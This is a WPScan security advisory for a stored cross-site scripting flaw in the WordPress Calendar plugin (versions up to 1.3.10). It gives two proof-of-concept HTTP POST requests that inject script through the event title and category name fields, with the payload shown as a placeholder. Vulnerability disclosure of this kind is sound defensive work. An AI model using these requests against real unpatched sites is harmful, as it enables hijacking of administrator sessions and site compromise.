Calendar <= 1.3.10 - Authenticated Stored Cross-Site Scripting (XSS)



Description
This WordPress plugin allows remote authenticated users, without the unfiltered_html capability, to execute JavaScript code through stored XSS attack. The plugin by default is available to users with contributor or more privileges.
Proof of Concept
POC 1#

You can inject JavaScript code into the event title when creating it:

POST /wordpress/wp-admin/admin.php?page=calendar HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wordpress/wp-admin/admin.php?page=calendar&action=delete&event_id=3&_wpnonce=cc7cb5ade4
Content-Type: application/x-www-form-urlencoded
Content-Length: 375
Connection: close

action=add&event_id=&_wpnonce=4c75b15fa6&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dcalendar%26action%3Ddelete%26event_id%3D3%26_wpnonce%3Dcc7cb5ade4&event_title=%[XSS]&event_desc=test&event_category=1&event_link=&event_begin=2018-10-30&event_end=2018-10-30&event_time=21%3A24&event_repeats=0&event_recur=S&save=Save+%C2%BB


POC 2#
You can inject JavaScript code into the category name when creating it:

POST /wordpress/wp-admin/admin.php?page=calendar-categories HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: 
Content-Type: application/x-www-form-urlencoded
Content-Length: 215
Connection: close

mode=add&category_id=&_wpnonce=fc2e4e9618&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dcalendar-categories&category_name=[XSS È&category_colour=&save=Save+%C2%BB

Affects Plugin

fixed in version 1.3.11

References

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher boombyte
Submitter boombyte
Views 1902
Verified No
WPVDB ID 9141

Timeline

Publicly Published 2018-10-30 (22 days ago)
Added 2018-11-02 (18 days ago)
Last Updated 2018-11-17 (3 days ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.